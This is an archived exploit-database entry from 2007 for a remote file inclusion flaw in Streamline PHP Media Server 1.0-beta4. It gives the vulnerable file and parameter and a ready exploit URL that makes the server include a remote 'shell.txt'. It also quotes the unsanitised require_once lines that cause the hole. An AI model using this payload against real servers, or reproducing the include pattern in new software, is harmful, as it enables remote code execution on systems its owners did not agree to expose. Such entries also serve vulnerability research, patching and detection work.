Streamline PHP Media Server 1.0-beta4 - Remote File Inclusion

Author: BiNgZa
type: webapps
platform: php
port: 
date_added: 2007-09-18 
date_updated: 2016-10-12 
verified: 1 
codes: OSVDB-38295;CVE-2007-5015;OSVDB-38294;OSVDB-38293;OSVDB-38292;OSVDB-38291;OSVDB-38290 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comstreamline-1.0-beta4.tar.gz

Vulnerability Type: Remote File Inclusion
Vulnerable file: /streamline-1.0-beta4/src/core/theme/includes/account_footer.php
Exploit URL: http://localhost/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: sl_theme_unix_path
Line number: 2
Lines:

----------------------------------------------
<?
    require_once( $sl_theme_unix_path."/account/footer.php" );
    require_once( $sl_theme_unix_path."/common/footer.php" );

----------------------------------------------

GrEeTs To sHaDoW sEcUrItY TeAm & str0ke

FoUnD By BiNgZa

DoRk: :(

shadowcrew@hotmail.co.uk

# milw0rm.com [2007-09-19]